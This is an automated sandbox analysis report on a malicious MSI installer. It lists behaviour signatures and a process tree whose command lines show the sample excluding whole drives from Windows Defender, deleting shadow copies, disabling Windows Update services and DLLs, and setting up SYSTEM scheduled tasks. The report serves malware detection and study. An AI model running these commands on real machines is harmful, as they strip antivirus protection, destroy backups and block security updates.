Analysis

  • max time kernel
    132s
  • max time network
    153s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    04/08/2026, 05:54

General

  • Target
    setup_n0c014.msi
  • Size 5.3MB
  • Sample260804-gl5c5adh92
  • SHA256 cebbbc46999f285dd99780783fec4e00286199cd508d24f8f7d076b9c43cb24b
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Possible privilege escalation attempt 23 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 3 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 30 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup_n0c014.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:3340
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2944
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2588
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 46FE0E4CF36A3451ACA9FABAD3B77B58 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:1912
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:2568
  • C:\Users\Public\MR2Qw9\Na2Hi9.exe
    "C:\Users\Public\MR2Qw9\Na2Hi9.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:2612
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\MR2Qw9\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:4868
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\MR2Qw9\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4364
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:5088
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:2216
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:3768
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2940
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:712
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:4964
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:2676
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4836
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:3516
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:4328
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:4144
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:940
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:1360
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:2684
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:3760
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:1056
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:2672
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:2952
                        • C:\Program Files (x86)\zYcKXP\gMiIMH.exe
                          "C:\Program Files (x86)\zYcKXP\gMiIMH.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:1220
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4244
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\zYcKXP" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3708
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\zYcKXP" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5416
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:1516
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2940
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2640
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\zYcKXP" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:5444
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\zYcKXP" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:400
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            PID:5848
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                                PID:200
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop wuauserv
                                  5⤵
                                    PID:5232
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  PID:2832
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure wuauserv reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  PID:4392
                                • C:\Windows\SysWOW64\net.exe
                                  net stop UsoSvc
                                  4⤵
                                    PID:2732
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop UsoSvc
                                      5⤵
                                        PID:4512
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config UsoSvc start= disabled
                                      4⤵
                                      • Launches sc.exe
                                      PID:3336
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc failure UsoSvc reset= 0 actions= ""
                                      4⤵
                                      • Launches sc.exe
                                      PID:4960
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop uhssvc
                                      4⤵
                                        PID:4520
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop uhssvc
                                          5⤵
                                            PID:1684
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc config uhssvc start= disabled
                                          4⤵
                                          • Launches sc.exe
                                          PID:2772
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc failure uhssvc reset= 0 actions= ""
                                          4⤵
                                          • Launches sc.exe
                                          PID:6004
                                        • C:\Windows\SysWOW64\net.exe
                                          net stop WaaSMedicSvc
                                          4⤵
                                            PID:1036
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 stop WaaSMedicSvc
                                              5⤵
                                                PID:3436
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc config WaaSMedicSvc start= disabled
                                              4⤵
                                              • Launches sc.exe
                                              PID:2036
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc failure WaaSMedicSvc reset= 0 actions= ""
                                              4⤵
                                              • Launches sc.exe
                                              PID:4972
                                            • C:\Windows\SysWOW64\takeown.exe
                                              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:4576
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:4896
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:2400
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:3920
                                            • C:\Windows\SysWOW64\takeown.exe
                                              takeown /f C:\Windows\System32\wuaueng.dll
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:3824
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:5708
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:4996
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:764
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                              4⤵
                                                PID:4984
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                                4⤵
                                                  PID:4244
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                                  4⤵
                                                    PID:5716
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    PID:3812
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\zYcKXP\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  3⤵
                                                  • Indicator Removal: Clear Persistence
                                                  PID:4108
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\zYcKXP\" /t REG_DWORD /d 0 /f"
                                                    4⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:5132
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    SCHTASKS /Run /TN "Task1"
                                                    4⤵
                                                      PID:3928
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      SCHTASKS /Delete /TN "Task1" /F
                                                      4⤵
                                                        PID:1820
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\zYcKXP" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:2912
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\zYcKXP" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:5524
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                      3⤵
                                                      • Indicator Removal: Clear Persistence
                                                      PID:4432
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                        4⤵
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:2612
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        SCHTASKS /Run /TN "Task1"
                                                        4⤵
                                                          PID:1188
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          SCHTASKS /Delete /TN "Task1" /F
                                                          4⤵
                                                            PID:1956
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /c icacls "C:\Program Files (x86)\zYcKXP\gMiIMH.exe" /inheritance:r
                                                          3⤵
                                                          • Executes a command shell one-liner
                                                          PID:3752
                                                          • C:\Windows\SysWOW64\icacls.exe
                                                            icacls "C:\Program Files (x86)\zYcKXP\gMiIMH.exe" /inheritance:r
                                                            4⤵
                                                            • Possible privilege escalation attempt
                                                            • Modifies file permissions
                                                            PID:3376
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /c icacls "C:\Program Files (x86)\zYcKXP\gMiIMH.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                          3⤵
                                                          • Executes a command shell one-liner
                                                          PID:252
                                                          • C:\Windows\SysWOW64\icacls.exe
                                                            icacls "C:\Program Files (x86)\zYcKXP\gMiIMH.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                            4⤵
                                                            • Possible privilege escalation attempt
                                                            • Modifies file permissions
                                                            PID:4956
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /c icacls "C:\Program Files (x86)\zYcKXP\gMiIMH.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                          3⤵
                                                          • Executes a command shell one-liner
                                                          PID:4976
                                                          • C:\Windows\SysWOW64\icacls.exe
                                                            icacls "C:\Program Files (x86)\zYcKXP\gMiIMH.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                            4⤵
                                                            • Possible privilege escalation attempt
                                                            • Modifies file permissions
                                                            PID:620
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                          3⤵
                                                          • Indicator Removal: Clear Persistence
                                                          PID:4436
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                            4⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:3660
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            SCHTASKS /Run /TN "Task1"
                                                            4⤵
                                                              PID:1240
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              SCHTASKS /Delete /TN "Task1" /F
                                                              4⤵
                                                                PID:668
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /c icacls "C:\Program Files (x86)\zYcKXP\image.png" /inheritance:r
                                                              3⤵
                                                              • Executes a command shell one-liner
                                                              PID:5840
                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                icacls "C:\Program Files (x86)\zYcKXP\image.png" /inheritance:r
                                                                4⤵
                                                                • Possible privilege escalation attempt
                                                                • Modifies file permissions
                                                                PID:4536
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /c icacls "C:\Program Files (x86)\zYcKXP\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                              3⤵
                                                              • Executes a command shell one-liner
                                                              PID:5076
                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                icacls "C:\Program Files (x86)\zYcKXP\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                                4⤵
                                                                • Possible privilege escalation attempt
                                                                • Modifies file permissions
                                                                PID:4548
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /c icacls "C:\Program Files (x86)\zYcKXP\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                              3⤵
                                                              • Executes a command shell one-liner
                                                              PID:3028
                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                icacls "C:\Program Files (x86)\zYcKXP\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                                4⤵
                                                                • Possible privilege escalation attempt
                                                                • Modifies file permissions
                                                                PID:4136
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                              3⤵
                                                              • Indicator Removal: Clear Persistence
                                                              PID:4420
                                                              • C:\Windows\SysWOW64\schtasks.exe
